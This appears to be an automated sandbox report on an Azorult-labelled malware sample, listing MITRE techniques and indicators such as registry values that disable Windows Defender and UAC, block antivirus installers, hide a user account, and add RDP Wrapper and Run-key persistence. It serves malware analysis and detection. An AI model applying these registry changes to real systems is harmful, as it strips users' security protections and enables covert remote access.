azorult | hxxp://github[.]com/endermanch

Windows Service

Disable or Modify Tools

T1562.001

Processes:

Azorult.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

Hidden Files and Directories

T1564.001

Modify Registry

Processes:

taskhostw.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

Processes:

Azorult.exeregedit.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Windows security bypass 2 TTPs 1 IoCs
evasion trojan

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

regedit.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

net.exenet1.exe

pid process

6036 net.exe
5744 net1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

pid	process
6036	net.exe
5744	net1.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

Processes:

Azorult.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

cmd.exeAzorult.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
5468	netsh.exe
5448	netsh.exe
5728	netsh.exe
5844	netsh.exe
5040	netsh.exe
5784	netsh.exe
5860	netsh.exe
5376	netsh.exe
5568	netsh.exe
5904	netsh.exe
5992	netsh.exe
6072	netsh.exe
1708	netsh.exe
4124	netsh.exe
3896	netsh.exe
5444	netsh.exe
5632	netsh.exe
5492	netsh.exe
5144	netsh.exe
5196	netsh.exe
2376	netsh.exe
5128	netsh.exe
5340	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

RDPWInst.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

5928 attrib.exe
3892 attrib.exe
1324 attrib.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
5928	attrib.exe
3892	attrib.exe
1324	attrib.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8decoder.dll	acprotect
C:\ProgramData\Windows\vp8encoder.dll	acprotect

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242

Checks computer location settings 2 TTPs 15 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

wini.exeWScript.execheat.exetaskhost.exeNW_store.exewinlog.exeWScript.exeAzorult.exeNW_store.exePcAppStore.exeR8.exeNW_store.exeWScript.exewinlogon.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	NW_store.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Azorult.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	NW_store.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	PcAppStore.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	NW_store.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 46 IoCs

Processes:

Azorult.exewini.exewinit.exerutserv.exerutserv.exerutserv.execheat.exerutserv.exeAzorult.exerfusclient.exerfusclient.exeink.exetaskhost.exeP.exerfusclient.exeR8.exewinlog.exeRar.exewinlogon.exeRDPWInst.exetaskhostw.exewinlogon.exeRDPWInst.exetaskhostw.exeLokibot.exeLokibot.exetaskhostw.exebutterflyondesktop.exebutterflyondesktop.tmpButterflyOnDesktop.exetaskhostw.exetaskhostw.exeSetup.exetaskhostw.exePcAppStore.exeWatchdog.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeSetupEngine.exeNW_store.exeNW_store.exe

pid	process
4988	Azorult.exe
744	wini.exe
4044	winit.exe
3764	rutserv.exe
4436	rutserv.exe
4972	rutserv.exe
1656	cheat.exe
1652	rutserv.exe
2864	Azorult.exe
220	rfusclient.exe
4344	rfusclient.exe
2404	ink.exe
3620	taskhost.exe
4340	P.exe
4600	rfusclient.exe
648	R8.exe
6128	winlog.exe
6028	Rar.exe
5936	winlogon.exe
6040	RDPWInst.exe
624	taskhostw.exe
3508	winlogon.exe
5792	RDPWInst.exe
5208	taskhostw.exe
3096	Lokibot.exe
5472	Lokibot.exe
3088	taskhostw.exe
5508	butterflyondesktop.exe
5656	butterflyondesktop.tmp
868	ButterflyOnDesktop.exe
5592	taskhostw.exe
5796	taskhostw.exe
3112	Setup.exe
3776	taskhostw.exe
4724	PcAppStore.exe
5876	Watchdog.exe
1876	NW_store.exe
3404	NW_store.exe
5488	NW_store.exe
5484	NW_store.exe
4600	NW_store.exe
2928	NW_store.exe
6388	NW_store.exe
2732	SetupEngine.exe
4764	NW_store.exe
5416	NW_store.exe

Loads dropped DLL 45 IoCs

Processes:

svchost.exense46E6.tmpNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeSetupEngine.exeNW_store.exeNW_store.exe

pid	process
5364	svchost.exe
3724	nse46E6.tmp
3724	nse46E6.tmp
3724	nse46E6.tmp
3724	nse46E6.tmp
3724	nse46E6.tmp
3724	nse46E6.tmp
3724	nse46E6.tmp
3724	nse46E6.tmp
3724	nse46E6.tmp
1876	NW_store.exe
1876	NW_store.exe
1876	NW_store.exe
3404	NW_store.exe
5488	NW_store.exe
5484	NW_store.exe
5488	NW_store.exe
5488	NW_store.exe
5484	NW_store.exe
5484	NW_store.exe
5488	NW_store.exe
5488	NW_store.exe
5488	NW_store.exe
4600	NW_store.exe
5488	NW_store.exe
4600	NW_store.exe
4600	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
6388	NW_store.exe
6388	NW_store.exe
6388	NW_store.exe
2732	SetupEngine.exe
2732	SetupEngine.exe
2732	SetupEngine.exe
2732	SetupEngine.exe
2732	SetupEngine.exe
4764	NW_store.exe
5416	NW_store.exe
4764	NW_store.exe
4764	NW_store.exe
5416	NW_store.exe
5416	NW_store.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4960	icacls.exe
5968	icacls.exe
5484	icacls.exe
5612	icacls.exe
5284	icacls.exe
3496	icacls.exe
5636	icacls.exe
5524	icacls.exe
5292	icacls.exe
620	icacls.exe
4960	icacls.exe
5508	icacls.exe
5760	icacls.exe
5048	icacls.exe
3592	icacls.exe
2208	icacls.exe
3112	icacls.exe
6052	icacls.exe
4336	icacls.exe
4304	icacls.exe
5876	icacls.exe
4124	icacls.exe
2476	icacls.exe
5560	icacls.exe
5792	icacls.exe
2568	icacls.exe
5656	icacls.exe
5720	icacls.exe
5236	icacls.exe
5800	icacls.exe
5956	icacls.exe
3096	icacls.exe
5464	icacls.exe
5472	icacls.exe
5992	icacls.exe
3112	icacls.exe
5672	icacls.exe
3744	icacls.exe
5696	icacls.exe
5228	icacls.exe
5224	icacls.exe
1948	icacls.exe
5480	icacls.exe
3464	icacls.exe
5020	icacls.exe
6060	icacls.exe
6004	icacls.exe
3644	icacls.exe
5316	icacls.exe
5516	icacls.exe
3100	icacls.exe
5596	icacls.exe
5924	icacls.exe
5732	icacls.exe
5496	icacls.exe
5320	icacls.exe
1256	icacls.exe
2000	icacls.exe
5588	icacls.exe
2928	icacls.exe
5300	icacls.exe
5780	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/3096-1046-0x0000000002EB0000-0x0000000002EC4000-memory.dmp	agile_net

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8decoder.dll	upx
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\Microsoft\Intel\winlogon.exe	upx
behavioral1/memory/5936-905-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/5936-928-0x0000000000400000-0x0000000000419000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\autD378.tmp	upx
behavioral1/memory/3508-966-0x00000000000D0000-0x00000000001BC000-memory.dmp	upx
behavioral1/memory/3508-972-0x00000000000D0000-0x00000000001BC000-memory.dmp	upx

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

taskhostw.exebutterflyondesktop.tmpnse46E6.tmp

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop	butterflyondesktop.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCAppStore = "\"C:\\Users\\Admin\\PCAppStore\\PCAppStore.exe\" /init default"	nse46E6.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PcAppStoreUpdater = "\"C:\\Users\\Admin\\PCAppStore\\AutoUpdater.exe\" /i"	nse46E6.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Watchdog = "\"C:\\Users\\Admin\\PCAppStore\\Watchdog.exe\" /guid=6F95B8B4-C02B-43C9-8CD4-016780936B63X /rid=20240901212608.543240954796 /ver=fa.1091v"	nse46E6.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Azorult.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

6068 powershell.exe
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

PcAppStore.exe

description ioc process

File opened (read-only) \??\F: PcAppStore.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

pid	process
6068	powershell.exe

description	ioc	process
File opened (read-only)	\??\F:	PcAppStore.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

Processes:

flow	ioc
120	iplogger.org
121	iplogger.org
24	camo.githubusercontent.com
26	camo.githubusercontent.com
27	camo.githubusercontent.com
29	camo.githubusercontent.com
105	raw.githubusercontent.com
112	raw.githubusercontent.com
28	camo.githubusercontent.com
30	camo.githubusercontent.com
83	raw.githubusercontent.com
113	raw.githubusercontent.com
33	raw.githubusercontent.com
106	raw.githubusercontent.com
25	camo.githubusercontent.com
84	raw.githubusercontent.com
144	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

95 ip-api.com

flow	ioc
95	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

Processes:

Azorult.exeRDPWInst.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 542324.crdownload	autoit_exe
C:\ProgramData\Windows\winit.exe	autoit_exe
C:\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe
behavioral1/memory/3508-972-0x00000000000D0000-0x00000000001BC000-memory.dmp	autoit_exe

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

persistence privilege_escalation

Processes:

NW_store.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	NW_store.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	NW_store.exe

Drops file in System32 directory 7 IoCs

Processes:

powershell.exeRDPWInst.exechrome.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

Processes:

Azorult.exeregedit.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Lokibot.exe

description pid process target process

PID 3096 set thread context of 5472 3096 Lokibot.exe Lokibot.exe

description	pid	process	target process
PID 3096 set thread context of 5472	3096	Lokibot.exe	Lokibot.exe

Drops file in Program Files directory 33 IoCs

Processes:

Azorult.exeattrib.exebutterflyondesktop.tmpattrib.exeRDPWInst.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File opened for modification	C:\Program Files\ESET	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File created	C:\Program Files (x86)\Butterfly on Desktop\is-8S7TU.tmp	butterflyondesktop.tmp
File created	C:\Program Files (x86)\Butterfly on Desktop\is-V6P16.tmp	butterflyondesktop.tmp
File created	C:\Program Files (x86)\Butterfly on Desktop\is-FT87J.tmp	butterflyondesktop.tmp
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult.exe
File created	C:\Program Files (x86)\Butterfly on Desktop\is-08I0O.tmp	butterflyondesktop.tmp
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File created	C:\Program Files (x86)\Butterfly on Desktop\unins000.dat	butterflyondesktop.tmp
File opened for modification	C:\Program Files\AVG	Azorult.exe
File opened for modification	C:\Program Files (x86)\Butterfly on Desktop\unins000.dat	butterflyondesktop.tmp
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
5852	sc.exe
5916	sc.exe
6112	sc.exe
6104	sc.exe
4336	sc.exe
1116	sc.exe
5364	sc.exe
5236	sc.exe
5360	sc.exe
5432	sc.exe
5556	sc.exe
5620	sc.exe
5752	sc.exe
5976	sc.exe
2476	sc.exe
5196	sc.exe
5252	sc.exe
5220	sc.exe
5492	sc.exe
5684	sc.exe
1952	sc.exe
3532	sc.exe
5192	sc.exe
2792	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

Processes:

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
